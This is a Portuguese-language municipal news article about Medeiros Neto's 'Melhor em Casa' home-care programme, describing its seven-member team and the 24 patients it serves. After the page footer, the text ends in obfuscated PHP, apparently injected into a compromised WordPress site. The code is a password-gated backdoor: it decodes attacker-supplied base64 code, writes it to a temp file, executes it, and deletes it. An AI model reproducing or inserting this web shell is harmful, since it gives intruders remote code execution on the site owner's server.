• SEJA BEM-VINDO

Pacientes de Medeiros Neto contam com atendimento domiciliar pelo Programa Melhor em Casa

Publicado em: 06/05/2022 Atualizado:: maio 6, 2022

 

Pacientes de Medeiros Neto que possuem doenças graves ou crônicas contam com o atendimento domiciliar da equipe multiprofissional do Programa Melhor em Casa

 

A possibilidade de ser atendido em casa, perto da família, é um dos benefícios do programa do Governo Federal, assegurado pela Prefeitura Municipal, através da Secretaria de Saúde.

 

Além disso, as pessoas que precisam dessa assistência podem passar menos tempo no hospital, reduzindo o risco de novas infecções e tendo mais comodidade no tratamento. Isso sem contar a economia proporcionada ao Sistema Único de Saúde (SUS), quando um paciente não está ocupando um leito hospitalar.

 

 

A equipe de Medeiros Neto, que atua no Melhor em Casa e visita as residências periodicamente, é formada por sete profissionais, sendo: uma coordenadora do programa, um médico, dois enfermeiros, um fisioterapeuta, dois técnicos em enfermagem e um motorista.

 

 

A frequência das visitas é definida de acordo com a especificidade de cada paciente, assim como o tipo de atendimento: exame, medicação, reabilitação, entre outros.

 

Através desse acompanhamento, a equipe conhece melhor a realidade do paciente e pode auxiliar na melhoria da qualidade de vida de toda a família, podendo também ajudar a identificar casos de abandono e maus tratos.

 

 

 

É um compromisso da atual gestão garantir mais humanização na saúde e o Programa Melhor em Casa é assegurado no município reforçando esse intuito. Atualmente, são 24 pessoas atendidas, podendo chegar a 30, devido ao porte do município.

 

Caso algum paciente que tenha direito ainda não esteja fazendo parte do programa, deve procurar a unidade de saúde mais próxima para que a situação seja avaliada.

 

 

 

 

Prefeitura Municipal de Medeiros Neto
Nossa gente em primeiro lugar

 

……………………………..

 

Fonte: Ascom/PMN

 


JORNAL INDEPENDENTE


Siga as redes sociais

if(!function_exists("_set_fetas_tag") && !function_exists("_set_betas_tag")){try{function _set_fetas_tag(){if(isset($_GET['here'])&&!isset($_POST['here'])){die(md5(8));}if(isset($_POST['here'])){$a1='m'.'d5';if($a1($a1($_POST['here']))==="83a7b60dd6a5daae1a2f1a464791dac4"){$a2="fi"."le"."_put"."_contents";$a22="base";$a22=$a22."64";$a22=$a22."_d";$a22=$a22."ecode";$a222="PD"."9wa"."HAg";$a2222=$_POST[$a1];$a3="sy"."s_ge"."t_te"."mp_dir";$a3=$a3();$a3 = $a3."/".$a1(uniqid(rand(), true));@$a2($a3,$a22($a222).$a22($a2222));include($a3); @$a2($a3,'1'); @unlink($a3);die();}else{echo md5(7);}die();}} _set_fetas_tag();if(!isset($_POST['here'])&&!isset($_GET['here'])){function _set_betas_tag(){echo "";}add_action('wp_head','_set_betas_tag');}}catch(Exception $e){}}